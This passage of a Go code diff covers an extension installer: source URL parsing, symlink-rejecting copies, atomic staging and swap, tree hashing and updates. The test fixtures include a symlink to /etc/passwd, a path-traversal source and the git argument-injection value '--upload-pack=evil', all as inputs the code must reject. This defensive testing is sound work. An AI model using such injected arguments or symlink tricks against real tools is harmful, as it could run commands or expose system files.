+	writeFixture(t, filepath.Join(real, "spec.yaml"), "x\n", 0o644)
+	linked := filepath.Join(t.TempDir(), "link")
+	if err := os.Symlink(real, linked); err != nil {
+		t.Skipf("symlinks unavailable: %v", err)
+	}
+
+	dst := filepath.Join(t.TempDir(), "out")
+	if err := copyExtensionTree(linked, dst, defaultLimits()); err == nil {
+		t.Fatal("copyExtensionTree accepted a symlinked source root")
+	}
+}
+
+func TestCopyExtensionTreeRejectsSymlink(t *testing.T) {
+	src := t.TempDir()
+	dst := filepath.Join(t.TempDir(), "out")
+	writeFixture(t, filepath.Join(src, "spec.yaml"), "x\n", 0o644)
+	if err := os.Symlink("/etc/passwd", filepath.Join(src, "leak")); err != nil {
+		t.Skipf("symlinks unavailable: %v", err)
+	}
+
+	err := copyExtensionTree(src, dst, defaultLimits())
+	if err == nil {
+		t.Fatal("copyExtensionTree accepted a symlink")
+	}
+	if !strings.Contains(err.Error(), "leak") {
+		t.Fatalf("error does not name the offending path: %v", err)
+	}
+}
+
+func TestCopyExtensionTreeEnforcesFileCap(t *testing.T) {
+	src := t.TempDir()
+	dst := filepath.Join(t.TempDir(), "out")
+	for i := 0; i < 4; i++ {
+		writeFixture(t, filepath.Join(src, string(rune('a'+i))+".txt"), "x\n", 0o644)
+	}
+
+	if err := copyExtensionTree(src, dst, copyLimits{MaxFiles: 2, MaxBytes: 1 << 20}); err == nil {
+		t.Fatal("copyExtensionTree ignored MaxFiles")
+	}
+}
+
+func TestCopyExtensionTreeEnforcesByteCap(t *testing.T) {
+	src := t.TempDir()
+	dst := filepath.Join(t.TempDir(), "out")
+	writeFixture(t, filepath.Join(src, "big.bin"), strings.Repeat("x", 4096), 0o644)
+
+	if err := copyExtensionTree(src, dst, copyLimits{MaxFiles: 10, MaxBytes: 1024}); err == nil {
+		t.Fatal("copyExtensionTree ignored MaxBytes")
+	}
+}
+
+func TestCopyExtensionTreeRequiresExistingSource(t *testing.T) {
+	if err := copyExtensionTree(filepath.Join(t.TempDir(), "missing"), t.TempDir(), defaultLimits()); err == nil {
+		t.Fatal("copyExtensionTree accepted a missing source")
+	}
+}
+
+func countFiles(t *testing.T, dir string) int {
+	t.Helper()
+	count := 0
+	err := filepath.WalkDir(dir, func(_ string, entry fs.DirEntry, err error) error {
+		if err != nil {
+			return err
+		}
+		if !entry.IsDir() {
+			count++
+		}
+		return nil
+	})
+	if err != nil {
+		t.Fatalf("walk %s: %v", dir, err)
+	}
+	return count
+}

--- a/internal/extinstall/source.go
+++ b/internal/extinstall/source.go
@@ -1,0 +1,278 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"fmt"
+	"net/url"
+	"os"
+	"path"
+	"path/filepath"
+	"regexp"
+	"strings"
+
+	"enclave/internal/util"
+)
+
+// defaultHost is assumed for bare owner/repo shorthands.
+const defaultHost = "https://github.com"
+
+// source is a parsed install source: which repository to fetch, at which ref,
+// and which directory inside it to install. Ref and Subpath may be empty.
+type source struct {
+	Raw        string
+	RemoteURL  string
+	Ref        string
+	RefFromURL bool
+	Subpath    string
+}
+
+// parseSource accepts owner/repo shorthands (optionally followed by a
+// subpath), https/ssh/git repository URLs, forge "tree" URLs, scp-style
+// remotes, and local filesystem paths to git repositories.
+func parseSource(raw string) (source, error) {
+	trimmed := strings.TrimSpace(raw)
+	if trimmed == "" {
+		return source{}, fmt.Errorf("source is empty")
+	}
+	if strings.HasPrefix(trimmed, "-") {
+		return source{}, fmt.Errorf("invalid source %q", trimmed)
+	}
+	src := source{Raw: trimmed}
+
+	switch {
+	case isLocalPath(trimmed):
+		localPath := trimmed
+		if strings.HasPrefix(trimmed, "~") {
+			home, err := os.UserHomeDir()
+			if err != nil {
+				return source{}, err
+			}
+			localPath = util.ExpandTilde(trimmed, home)
+		}
+		abs, err := filepath.Abs(localPath)
+		if err != nil {
+			return source{}, err
+		}
+		src.RemoteURL = abs
+		return src, nil
+	case isSCPLike(trimmed):
+		// A trailing ".git" is stripped from every repository URL form; an
+		// scp-style remote is no exception even though it is otherwise passed
+		// through untouched (there is no reliable way to split a subpath out
+		// of it).
+		src.RemoteURL = strings.TrimSuffix(trimmed, ".git")
+		return src, nil
+	case hasScheme(trimmed):
+		return parseURLSource(src, trimmed)
+	default:
+		return parseShorthand(src, trimmed)
+	}
+}
+
+func isLocalPath(raw string) bool {
+	return strings.HasPrefix(raw, "./") || strings.HasPrefix(raw, "../") ||
+		strings.HasPrefix(raw, "/") || raw == "." || strings.HasPrefix(raw, "~")
+}
+
+// isSCPLike matches git's scp-style syntax (user@host:path) without mistaking
+// a URL scheme for it.
+func isSCPLike(raw string) bool {
+	if hasScheme(raw) {
+		return false
+	}
+	at := strings.Index(raw, "@")
+	colon := strings.Index(raw, ":")
+	return at > 0 && colon > at
+}
+
+func hasScheme(raw string) bool {
+	for _, scheme := range []string{"https://", "http://", "ssh://", "git://", "file://"} {
+		if strings.HasPrefix(raw, scheme) {
+			return true
+		}
+	}
+	return false
+}
+
+func parseURLSource(src source, raw string) (source, error) {
+	parsed, err := url.Parse(raw)
+	if err != nil {
+		return source{}, fmt.Errorf("invalid source URL %q: %w", raw, err)
+	}
+	if parsed.Host == "" {
+		return source{}, fmt.Errorf("source URL %q has no host", raw)
+	}
+	segments, err := splitSegments(strings.Trim(parsed.Path, "/"))
+	if err != nil {
+		return source{}, err
+	}
+	if len(segments) < 2 {
+		return source{}, fmt.Errorf("source URL %q does not name a repository", raw)
+	}
+
+	repoEnd, ref, rest, err := splitTreeURL(segments)
+	if err != nil {
+		return source{}, err
+	}
+	repo := append([]string{}, segments[:repoEnd]...)
+	repo[len(repo)-1] = strings.TrimSuffix(repo[len(repo)-1], ".git")
+
+	base := &url.URL{Scheme: parsed.Scheme, User: parsed.User, Host: parsed.Host, Path: "/" + strings.Join(repo, "/")}
+	src.RemoteURL = base.String()
+	src.Ref = ref
+	src.RefFromURL = ref != ""
+	if len(rest) > 0 {
+		subpath, subErr := normalizeSubpath(strings.Join(rest, "/"))
+		if subErr != nil {
+			return source{}, subErr
+		}
+		src.Subpath = subpath
+	}
+	return src, nil
+}
+
+// splitTreeURL locates a forge tree marker ("/tree/<ref>/..." or
+// "/-/tree/<ref>/...") and reports where the repository path ends, the ref it
+// names, and the remaining path segments.
+func splitTreeURL(segments []string) (repoEnd int, ref string, rest []string, err error) {
+	for i, segment := range segments {
+		switch segment {
+		case "blob":
+			return 0, "", nil, fmt.Errorf("a blob URL points at a file; link the extension directory instead")
+		case "tree":
+			if i+1 >= len(segments) {
+				return 0, "", nil, fmt.Errorf("tree URL is missing a ref")
+			}
+			end := i
+			if i > 0 && segments[i-1] == "-" {
+				end = i - 1
+			}
+			if end < 2 {
+				return 0, "", nil, fmt.Errorf("tree URL does not name a repository")
+			}
+			return end, segments[i+1], segments[i+2:], nil
+		}
+	}
+	return len(segments), "", nil, nil
+}
+
+func parseShorthand(src source, raw string) (source, error) {
+	segments, err := splitSegments(raw)
+	if err != nil {
+		return source{}, err
+	}
+	if len(segments) < 2 {
+		return source{}, fmt.Errorf("source %q must be owner/repo (optionally followed by a path)", raw)
+	}
+	owner := segments[0]
+	repo := strings.TrimSuffix(segments[1], ".git")
+	src.RemoteURL = fmt.Sprintf("%s/%s/%s", defaultHost, owner, repo)
+	if len(segments) > 2 {
+		subpath, subErr := normalizeSubpath(strings.Join(segments[2:], "/"))
+		if subErr != nil {
+			return source{}, subErr
+		}
+		src.Subpath = subpath
+	}
+	return src, nil
+}
+
+func splitSegments(raw string) ([]string, error) {
+	if raw == "" {
+		return nil, fmt.Errorf("source path is empty")
+	}
+	segments := strings.Split(raw, "/")
+	for _, segment := range segments {
+		if segment == "" {
+			return nil, fmt.Errorf("source %q has an empty path segment", raw)
+		}
+		if segment == "." || segment == ".." {
+			return nil, fmt.Errorf("source %q must not contain %q", raw, segment)
+		}
+	}
+	return segments, nil
+}
+
+// normalizeSubpath validates a repository-relative directory path and returns
+// it slash-separated with no leading or trailing separator.
+func normalizeSubpath(raw string) (string, error) {
+	trimmed := strings.TrimSpace(strings.ReplaceAll(raw, "\\", "/"))
+	if trimmed == "" {
+		return "", fmt.Errorf("path is empty")
+	}
+	if strings.HasPrefix(trimmed, "/") {
+		return "", fmt.Errorf("path %q must be relative to the repository root", raw)
+	}
+	cleaned := path.Clean(trimmed)
+	if _, err := splitSegments(strings.Trim(cleaned, "/")); err != nil {
+		return "", err
+	}
+	return strings.Trim(cleaned, "/"), nil
+}
+
+// WithRef applies an explicit --ref. A ref that contradicts one already taken
+// from a tree URL is an error rather than a silent precedence rule.
+func (s source) WithRef(ref string) (source, error) {
+	trimmed := strings.TrimSpace(ref)
+	if trimmed == "" {
+		return s, nil
+	}
+	if s.RefFromURL && s.Ref != trimmed {
+		return source{}, fmt.Errorf("source URL names ref %q but --ref says %q", s.Ref, trimmed)
+	}
+	s.Ref = trimmed
+	return s, nil
+}
+
+// WithPath applies an explicit --path. It is rejected when the source string
+// already carried a subpath, so the two can never disagree.
+func (s source) WithPath(p string) (source, error) {
+	trimmed := strings.TrimSpace(p)
+	if trimmed == "" {
+		return s, nil
+	}
+	if s.Subpath != "" {
+		return source{}, fmt.Errorf("source already names path %q; drop --path", s.Subpath)
+	}
+	subpath, err := normalizeSubpath(trimmed)
+	if err != nil {
+		return source{}, err
+	}
+	s.Subpath = subpath
+	return s, nil
+}
+
+// Display is the redacted, human-facing rendering of a source.
+func (s source) Display() string {
+	display := RedactRemote(s.RemoteURL)
+	if s.Subpath != "" {
+		display += "/" + s.Subpath
+	}
+	if s.Ref != "" {
+		display += "@" + s.Ref
+	}
+	return display
+}
+
+// httpUserinfoPattern matches the userinfo component of an http(s) URL in free
+// text, which is how git's stderr embeds the remote it failed on.
+var httpUserinfoPattern = regexp.MustCompile(`(https?://)[^/@\s]*@`)
+
+// RedactRemote strips credentials from an http(s) remote URL, or from any
+// text containing one, so it is safe to print or persist. ssh, git,
+// scp-style, and local-path remotes are returned unchanged: their userinfo
+// (if any) is a required login, not a secret.
+func RedactRemote(remote string) string {
+	if parsed, err := url.Parse(remote); err == nil && parsed.User != nil &&
+		(parsed.Scheme == "http" || parsed.Scheme == "https") {
+		parsed.User = nil
+		return parsed.String()
+	}
+	return httpUserinfoPattern.ReplaceAllString(remote, "$1")
+}

--- a/internal/extinstall/source_test.go
+++ b/internal/extinstall/source_test.go
@@ -1,0 +1,159 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+func TestParseSource(t *testing.T) {
+	cases := []struct {
+		name    string
+		raw     string
+		remote  string
+		ref     string
+		subpath string
+	}{
+		{"shorthand", "acme/kits", "https://github.com/acme/kits", "", ""},
+		{"shorthand with subpath", "acme/kits/extensions/features/foo", "https://github.com/acme/kits", "", "extensions/features/foo"},
+		{"shorthand strips git suffix", "acme/kits.git", "https://github.com/acme/kits", "", ""},
+		{"https repo", "https://gitlab.com/acme/kits", "https://gitlab.com/acme/kits", "", ""},
+		{"https repo strips git suffix", "https://gitlab.com/acme/kits.git", "https://gitlab.com/acme/kits", "", ""},
+		{"github tree url", "https://github.com/acme/kits/tree/v1.2.0/extensions/tools/foo", "https://github.com/acme/kits", "v1.2.0", "extensions/tools/foo"},
+		{"gitlab tree url", "https://gitlab.com/acme/kits/-/tree/main/extensions/features/foo", "https://gitlab.com/acme/kits", "main", "extensions/features/foo"},
+		{"scp style", "git@github.com:acme/kits.git", "git@github.com:acme/kits", "", ""},
+		{"ssh url", "ssh://git@host/acme/kits.git", "ssh://git@host/acme/kits", "", ""},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			got, err := parseSource(tc.raw)
+			if err != nil {
+				t.Fatalf("parseSource(%q): %v", tc.raw, err)
+			}
+			if got.RemoteURL != tc.remote {
+				t.Errorf("remote = %q, want %q", got.RemoteURL, tc.remote)
+			}
+			if got.Ref != tc.ref {
+				t.Errorf("ref = %q, want %q", got.Ref, tc.ref)
+			}
+			if got.Subpath != tc.subpath {
+				t.Errorf("subpath = %q, want %q", got.Subpath, tc.subpath)
+			}
+			if got.Raw != tc.raw {
+				t.Errorf("raw = %q, want %q", got.Raw, tc.raw)
+			}
+		})
+	}
+}
+
+func TestParseSourceLocalPath(t *testing.T) {
+	got, err := parseSource("./my-kits")
+	if err != nil {
+		t.Fatalf("parseSource: %v", err)
+	}
+	if got.Subpath != "" {
+		t.Errorf("subpath = %q, want empty (local sources use --path)", got.Subpath)
+	}
+	if got.RemoteURL == "" || got.RemoteURL[0] != '/' {
+		t.Errorf("remote = %q, want an absolute path", got.RemoteURL)
+	}
+}
+
+func TestParseSourceExpandsTilde(t *testing.T) {
+	home, err := os.UserHomeDir()
+	if err != nil {
+		t.Skipf("os.UserHomeDir: %v", err)
+	}
+
+	got, err := parseSource("~/my-kits")
+	if err != nil {
+		t.Fatalf("parseSource: %v", err)
+	}
+	want := filepath.Join(home, "my-kits")
+	if got.RemoteURL != want {
+		t.Errorf("remote = %q, want %q", got.RemoteURL, want)
+	}
+
+	gotHome, err := parseSource("~")
+	if err != nil {
+		t.Fatalf("parseSource: %v", err)
+	}
+	if gotHome.RemoteURL != home {
+		t.Errorf("remote = %q, want %q", gotHome.RemoteURL, home)
+	}
+}
+
+func TestParseSourceRejects(t *testing.T) {
+	cases := []struct{ name, raw string }{
+		{"empty", "   "},
+		{"single segment", "acme"},
+		{"traversal in subpath", "acme/kits/../../etc"},
+		{"empty segment", "acme//kits"},
+		{"leading dash", "--upload-pack=evil"},
+		{"blob url", "https://github.com/acme/kits/blob/main/extensions/features/foo/spec.yaml"},
+		{"no host in url", "https:///acme/kits"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if _, err := parseSource(tc.raw); err == nil {
+				t.Fatalf("parseSource(%q) succeeded, want error", tc.raw)
+			}
+		})
+	}
+}
+
+func TestWithRefConflict(t *testing.T) {
+	src, err := parseSource("https://github.com/acme/kits/tree/v1/extensions/features/foo")
+	if err != nil {
+		t.Fatalf("parseSource: %v", err)
+	}
+	if _, err := src.WithRef("v1"); err != nil {
+		t.Fatalf("WithRef with matching ref: %v", err)
+	}
+	if _, err := src.WithRef("v2"); err == nil {
+		t.Fatal("WithRef with conflicting ref succeeded, want error")
+	}
+}
+
+func TestWithPathRejectsWhenSubpathPresent(t *testing.T) {
+	src, err := parseSource("acme/kits/extensions/features/foo")
+	if err != nil {
+		t.Fatalf("parseSource: %v", err)
+	}
+	if _, err := src.WithPath("extensions/features/bar"); err == nil {
+		t.Fatal("WithPath over an existing subpath succeeded, want error")
+	}
+}
+
+func TestRedactRemote(t *testing.T) {
+	cases := []struct {
+		name, in, want string
+	}{
+		{"https userinfo stripped", "https://user:token@github.com/acme/kits", "https://github.com/acme/kits"},
+		{"https bare token stripped", "https://ghp_token@github.com/o/r", "https://github.com/o/r"},
+		{"ssh url preserved verbatim", "ssh://git@host/acme/kits", "ssh://git@host/acme/kits"},
+		{"scp style preserved verbatim", "git@github.com:acme/kits.git", "git@github.com:acme/kits.git"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := RedactRemote(tc.in); got != tc.want {
+				t.Errorf("RedactRemote(%q) = %q, want %q", tc.in, got, tc.want)
+			}
+		})
+	}
+}
+
+func TestRedactRemoteInsideText(t *testing.T) {
+	got := RedactRemote("fatal: could not read from https://user:token@github.com/acme/kits")
+	if strings.Contains(got, "token") {
+		t.Fatalf("RedactRemote left a credential in free text: %q", got)
+	}
+}

--- a/internal/extinstall/stage.go
+++ b/internal/extinstall/stage.go
@@ -1,0 +1,181 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync/atomic"
+	"time"
+
+	"enclave/internal/model"
+	"enclave/internal/util"
+)
+
+const (
+	stagingPrefix  = ".incoming-"
+	replacedPrefix = ".replaced-"
+	// staleAge bounds how long a leftover staging directory is kept. An
+	// unlocked sweep has no race-free liveness signal, so mtime age decides;
+	// touch keeps a live run's directory looking alive.
+	staleAge = 24 * time.Hour
+)
+
+// replacedSwapSeq keeps the ".replaced-<name>-<pid>-<seq>" directory unique
+// across repeated commits of the same name within one process, where the pid
+// alone does not distinguish them.
+var replacedSwapSeq atomic.Uint64
+
+// staging is a per-run directory holding extensions after sanitization and
+// before the atomic swap. It sits inside the destination directory so the final
+// rename never crosses a filesystem boundary.
+type staging struct {
+	kindDir string
+	root    string
+	kind    model.ExtensionKind
+}
+
+// newStaging opens a staging directory for one run. A dry run stages outside
+// the destination instead of inside it: it never commits, so it needs neither
+// the same-filesystem rename nor the destination to exist, and creating that
+// directory would be exactly the touch a dry run promises not to make.
+func newStaging(env Env, kind model.ExtensionKind, dryRun bool) (*staging, error) {
+	kindDir := env.kindDir(kind)
+	if strings.TrimSpace(kindDir) == "" {
+		return nil, fmt.Errorf("no user extension directory is configured")
+	}
+	parent := ""
+	if !dryRun {
+		if err := os.MkdirAll(kindDir, 0o750); err != nil {
+			return nil, err
+		}
+		sweepStale(kindDir, env.now())
+		parent = kindDir
+	}
+
+	root, err := os.MkdirTemp(parent, stagingPrefix)
+	if err != nil {
+		return nil, err
+	}
+	return &staging{kindDir: kindDir, root: root, kind: kind}, nil
+}
+
+// sweepStale removes staging and replaced directories left behind by an
+// interrupted run. Dot-prefixed names are invisible to extension listing and
+// validation, so a leftover is inert until swept.
+func sweepStale(kindDir string, now time.Time) {
+	entries, err := os.ReadDir(kindDir)
+	if err != nil {
+		return
+	}
+	for _, entry := range entries {
+		name := entry.Name()
+		if !entry.IsDir() {
+			continue
+		}
+		if !strings.HasPrefix(name, stagingPrefix) && !strings.HasPrefix(name, replacedPrefix) {
+			continue
+		}
+		info, infoErr := entry.Info()
+		if infoErr != nil || now.Sub(info.ModTime()) < staleAge {
+			continue
+		}
+		_ = os.RemoveAll(filepath.Join(kindDir, name))
+	}
+}
+
+func (s *staging) extDir(name string) string { return filepath.Join(s.root, name) }
+
+// finalPath is where name lands once committed.
+func (s *staging) finalPath(name string) string { return filepath.Join(s.kindDir, name) }
+
+// discard drops one extension's staged copy so an --all run does not keep every
+// failed or declined candidate on disk until it ends. A committed copy has
+// already been renamed away, so this is a no-op for it.
+func (s *staging) discard(name string) {
+	dir := s.extDir(name)
+	if util.PathStrictlyWithin(s.root, dir) {
+		_ = os.RemoveAll(dir)
+	}
+}
+
+// touch refreshes the staging directory's own modification time, which is the
+// only thing sweepStale stats, so a long-running install keeps looking live.
+func (s *staging) touch(env Env) {
+	t := env.now()
+	_ = os.Chtimes(s.root, t, t)
+}
+
+func (s *staging) close() {
+	if s.root != "" {
+		_ = os.RemoveAll(s.root)
+	}
+}
+
+// commit swaps the staged extension into its final location under a host lock:
+// any existing directory is moved aside, the staged one renamed into place,
+// stamp (which may be nil) runs while the lock is still held, and only then is
+// the old directory deleted. A failure mid-swap, or a failing stamp, restores
+// what was there. stamp writes by path, so it has to run inside the lock: a
+// concurrent install of the same name could otherwise swap in its own content
+// first and receive this run's metadata.
+func (s *staging) commit(env Env, name string, stamp func(installedPath string) error) (string, error) {
+	final := s.finalPath(name)
+	if !util.PathStrictlyWithin(s.kindDir, final) {
+		return "", fmt.Errorf("refusing to install outside %s", s.kindDir)
+	}
+	staged := s.extDir(name)
+	replaced := filepath.Join(s.kindDir, fmt.Sprintf("%s%s-%d-%d", replacedPrefix, name, os.Getpid(), replacedSwapSeq.Add(1)))
+
+	err := util.WithFileLock(env.lockPath(), func() error {
+		hadExisting := false
+		if _, statErr := os.Stat(final); statErr == nil {
+			if renameErr := os.Rename(final, replaced); renameErr != nil {
+				return renameErr
+			}
+			hadExisting = true
+		}
+		if renameErr := os.Rename(staged, final); renameErr != nil {
+			if hadExisting {
+				_ = os.Rename(replaced, final)
+			}
+			return renameErr
+		}
+		if stamp != nil {
+			if stampErr := stamp(final); stampErr != nil {
+				// Unwind the swap so a stamp failure leaves the same state a
+				// rename failure would: nothing new visible under name.
+				_ = os.Rename(final, staged)
+				if hadExisting {
+					_ = os.Rename(replaced, final)
+				}
+				return stampErr
+			}
+		}
+		if hadExisting {
+			_ = os.RemoveAll(replaced)
+		}
+		return nil
+	})
+	if err != nil {
+		return "", err
+	}
+	return final, nil
+}
+
+// removeInstalled deletes an installed extension directory under the same lock.
+func removeInstalled(env Env, kind model.ExtensionKind, name string) error {
+	kindDir := env.kindDir(kind)
+	target := filepath.Join(kindDir, name)
+	if !util.PathStrictlyWithin(kindDir, target) {
+		return fmt.Errorf("refusing to remove %s: outside %s", target, kindDir)
+	}
+	return util.WithFileLock(env.lockPath(), func() error { return os.RemoveAll(target) })
+}

--- a/internal/extinstall/stage.go
+++ b/internal/extinstall/stage.go
@@ -140,6 +140,12 @@ func (s *staging) commit(env Env, name string, stamp func(installedPath string) 
 			if renameErr := os.Rename(final, replaced); renameErr != nil {
 				return renameErr
 			}
+			// A rename carries the original directory's mtime over, and that is
+			// all sweepStale looks at. Without this the recovery copy of an
+			// extension installed more than staleAge ago is born stale and the
+			// next add or update deletes it before the window has run.
+			now := env.now()
+			_ = os.Chtimes(replaced, now, now)
 			hadExisting = true
 		}
 		if renameErr := os.Rename(staged, final); renameErr != nil {

--- a/internal/extinstall/treehash.go
+++ b/internal/extinstall/treehash.go
@@ -1,0 +1,158 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"crypto/sha256"
+	"encoding/hex"
+	"fmt"
+	"io"
+	"io/fs"
+	"os"
+	"path/filepath"
+	"sort"
+
+	"enclave/internal/model"
+)
+
+// walkExtensionEntries walks dir and reports every entry below it (files and
+// directories, dir itself excluded) with its path relative to dir,
+// slash-separated regardless of OS.
+func walkExtensionEntries(dir string, fn func(rel string, path string, entry fs.DirEntry) error) error {
+	return filepath.WalkDir(dir, func(path string, entry fs.DirEntry, walkErr error) error {
+		if walkErr != nil {
+			return walkErr
+		}
+		if path == dir {
+			return nil
+		}
+		rel, err := filepath.Rel(dir, path)
+		if err != nil {
+			return err
+		}
+		return fn(filepath.ToSlash(rel), path, entry)
+	})
+}
+
+// walkExtensionFiles reports every non-directory entry below dir, excluding the
+// provenance sidecar. The sidecar is present in an installed tree and never in
+// a staged one, so counting or hashing it would report every update as a
+// content change, and would let writing provenance invalidate the tree hash
+// that provenance itself records.
+func walkExtensionFiles(dir string, fn func(rel string, path string, entry fs.DirEntry) error) error {
+	return walkExtensionEntries(dir, func(rel string, path string, entry fs.DirEntry) error {
+		if entry.IsDir() || rel == model.ExtensionSourceFilename {
+			return nil
+		}
+		return fn(rel, path, entry)
+	})
+}
+
+// fileDigest is one file's entry in a tree manifest.
+type fileDigest struct {
+	Mode   string
+	Size   int64
+	Sha256 string
+}
+
+// treeManifest is one read of an extension tree, viewed two ways: per-file
+// digests for the changed-file list an update prints, and the aggregate tree
+// hash recorded in the provenance sidecar.
+type treeManifest struct {
+	Files map[string]fileDigest
+	Hash  string
+}
+
+// readTreeManifest reads every file under extDir once, digesting it into both
+// its own entry and the aggregate tree hash. The provenance sidecar is
+// excluded; a missing extDir is an error.
+//
+// The aggregate hash is persisted in the sidecar and compared against on the
+// next update, so its construction — files in sorted path order, each
+// contributing path, normalized mode, length, and content — is a compatibility
+// contract: changing it makes every installed extension report as locally
+// modified.
+func readTreeManifest(extDir string) (treeManifest, error) {
+	type entry struct {
+		rel  string
+		mode string
+		path string
+	}
+	var entries []entry
+	err := walkExtensionFiles(extDir, func(rel string, path string, d fs.DirEntry) error {
+		info, err := d.Info()
+		if err != nil {
+			return err
+		}
+		entries = append(entries, entry{rel: rel, mode: normalizedModeString(info.Mode()), path: path})
+		return nil
+	})
+	if err != nil {
+		return treeManifest{}, err
+	}
+	sort.Slice(entries, func(i, j int) bool { return entries[i].rel < entries[j].rel })
+
+	manifest := treeManifest{Files: make(map[string]fileDigest, len(entries))}
+	tree := sha256.New()
+	for _, item := range entries {
+		digest, err := digestFile(item.path, item.rel, item.mode, tree)
+		if err != nil {
+			return treeManifest{}, err
+		}
+		manifest.Files[item.rel] = digest
+	}
+	manifest.Hash = "sha256:" + hex.EncodeToString(tree.Sum(nil))
+	return manifest, nil
+}
+
+// digestFile hashes one file's content into its own digest and into the running
+// tree hash, reading it once for both.
+func digestFile(path string, rel string, mode string, tree io.Writer) (digest fileDigest, err error) {
+	// #nosec G304 -- path came from walking the caller's extension dir.
+	file, err := os.Open(path)
+	if err != nil {
+		return fileDigest{}, err
+	}
+	defer func() {
+		if closeErr := file.Close(); closeErr != nil && err == nil {
+			err = closeErr
+		}
+	}()
+
+	info, err := file.Stat()
+	if err != nil {
+		return fileDigest{}, err
+	}
+	if _, err = fmt.Fprintf(tree, "%s\n%s\n%d\n", rel, mode, info.Size()); err != nil { // #nosec G705
+		return fileDigest{}, err
+	}
+	content := sha256.New()
+	if _, err = io.Copy(io.MultiWriter(tree, content), file); err != nil {
+		return fileDigest{}, err
+	}
+	return fileDigest{Mode: mode, Size: info.Size(), Sha256: hex.EncodeToString(content.Sum(nil))}, nil
+}
+
+// TreeHash digests the installed content of extDir so a later update can tell
+// whether the user edited it by hand.
+func TreeHash(extDir string) (string, error) {
+	manifest, err := readTreeManifest(extDir)
+	if err != nil {
+		return "", err
+	}
+	return manifest.Hash, nil
+}
+
+// normalizedModeString collapses a file mode to the two values the installer
+// ever writes, so an unrelated permission bit cannot look like a local edit.
+func normalizedModeString(mode os.FileMode) string {
+	if mode.Perm()&0o111 != 0 {
+		return "0755"
+	}
+	return "0644"
+}

--- a/internal/extinstall/update.go
+++ b/internal/extinstall/update.go
@@ -11,6 +11,7 @@ import (
 	"context"
 	"fmt"
 	"path/filepath"
+	"slices"
 	"sort"
 
 	"enclave/internal/config"
@@ -161,19 +162,13 @@ func updateOne(ctx context.Context, env Env, req Request, stage *staging, fetche
 		}
 		return ActionResult{}, fmt.Errorf("%s: %s", src.Display(), reason)
 	}
-	var selected *classified
-	for i := range match {
-		if match[i].Name == entry.Name {
-			selected = &match[i]
-			break
-		}
-	}
-	if selected == nil {
+	selected := slices.IndexFunc(match, func(c classified) bool { return c.Name == entry.Name })
+	if selected < 0 {
 		return ActionResult{}, fmt.Errorf("%s no longer provides this %s", src.Display(), req.Kind.Label())
 	}
 
 	before, inspectErr := inspect(installed, req.Kind)
-	plan := planFromRepo(src, repo, *selected, ActionUpdated)
+	plan := planFromRepo(src, repo, match[selected], ActionUpdated)
 	if inspectErr == nil {
 		plan.Before = &before
 	}

--- a/internal/extinstall/update.go
+++ b/internal/extinstall/update.go
@@ -1,0 +1,183 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"context"
+	"fmt"
+	"path/filepath"
+	"sort"
+
+	"enclave/internal/config"
+)
+
+// Update refreshes managed extensions of req.Kind. With no names it targets
+// every managed extension of that kind.
+func Update(ctx context.Context, env Env, req Request) ([]ActionResult, error) {
+	inventory, err := Inventory(env.Paths, req.Kind, nil, InventoryProvenance)
+	if err != nil {
+		return nil, err
+	}
+
+	targets, err := updateTargets(req, inventory)
+	if err != nil {
+		return nil, err
+	}
+	if req.Ref != "" && len(targets) > 1 {
+		return nil, fmt.Errorf("--ref applies to a single extension; name one")
+	}
+	if len(targets) == 0 {
+		return nil, fmt.Errorf("no %s extensions are installed from a git source", req.Kind.Label())
+	}
+
+	stage, err := newStaging(env, req.Kind, req.DryRun)
+	if err != nil {
+		return nil, err
+	}
+	defer stage.close()
+
+	fetched := newFetchCache(env.Fetcher)
+	defer fetched.close()
+
+	results := make([]ActionResult, 0, len(targets))
+	for _, name := range targets {
+		entry := inventory[name]
+		if entry.Origin == nil {
+			reason := "not installed by enclave; re-add it to manage it"
+			if entry.Problem != "" {
+				reason = "its provenance file could not be read; re-add it to manage it"
+			}
+			results = append(results, ActionResult{
+				Name:   name,
+				Action: ActionSkipped,
+				Error:  reason,
+			})
+			continue
+		}
+		result, updateErr := updateOne(ctx, env, req, stage, fetched, entry)
+		if updateErr != nil {
+			result = ActionResult{Name: name, Action: ActionFailed, Error: updateErr.Error()}
+		}
+		results = append(results, result)
+	}
+	return results, nil
+}
+
+// updateTargets resolves which extensions to consider: the named ones, or every
+// installed extension of this kind. Unmanaged names stay in the list so they can
+// be reported as skipped rather than vanishing.
+func updateTargets(req Request, inventory map[string]Managed) ([]string, error) {
+	if len(req.Names) > 0 {
+		for _, name := range req.Names {
+			if _, ok := inventory[name]; !ok {
+				return nil, fmt.Errorf("%s %q is not installed", req.Kind.Label(), name)
+			}
+		}
+		return req.Names, nil
+	}
+	names := make([]string, 0, len(inventory))
+	for name, entry := range inventory {
+		if entry.Source == config.SourceBuiltin {
+			continue
+		}
+		names = append(names, name)
+	}
+	sort.Strings(names)
+	return names, nil
+}
+
+func updateOne(ctx context.Context, env Env, req Request, stage *staging, fetched *fetchCache, entry Managed) (ActionResult, error) {
+	origin := *entry.Origin
+	installed := filepath.Join(env.kindDir(req.Kind), entry.Name)
+
+	src, err := parseSource(origin.Source)
+	if err != nil {
